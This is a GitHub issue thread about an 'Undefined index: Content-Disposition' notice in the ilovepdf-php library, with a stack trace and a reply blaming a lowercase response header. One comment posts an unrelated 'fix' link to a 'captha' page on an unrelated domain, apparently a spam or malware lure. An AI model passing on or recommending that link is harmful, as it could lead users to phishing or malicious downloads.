### ISSUE TITLE
Undefined index: Content-Disposition

### ISSUE THREAD

**Issue by mdawart** [ilovepdf/ilovepdf-php#56]
I think this is the same as in https://github.com/ilovepdf/ilovepdf-php/issues/46 and I posted it as a comment there earlier, but I assume this is unwatched - so I add a new issue for this: 

```[
  "exception" => ErrorException {
    #message: "Notice: Undefined index: Content-Disposition"
    #code: 0
    #file: "./vendor/ilovepdf/ilovepdf-php/src/Task.php"
    #line: 295
    #severity: E_NOTICE
    trace: {
      ./vendor/ilovepdf/ilovepdf-php/src/Task.php:295 { …}
      ./vendor/ilovepdf/ilovepdf-php/src/Task.php:235 { …}
      ./src/Service/ILovePdfHandler.php:39 {
        App\Service\ILovePdfHandler::compress(Email $email): array^
        › mkdir($compressedPath);
        › $myTaskCompress->download($path . 'compressed/');
        › EmailHandler::unpackFile('output.zip', $compressedPath);
      }
```

(we are using an older version of the library)

**Comment by Malove98** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by Melfith** [comment]
This issue has been fixed in the later version. Your error is certainly due to a response with "content-disposition" within the header instead of "Content-Disposition".
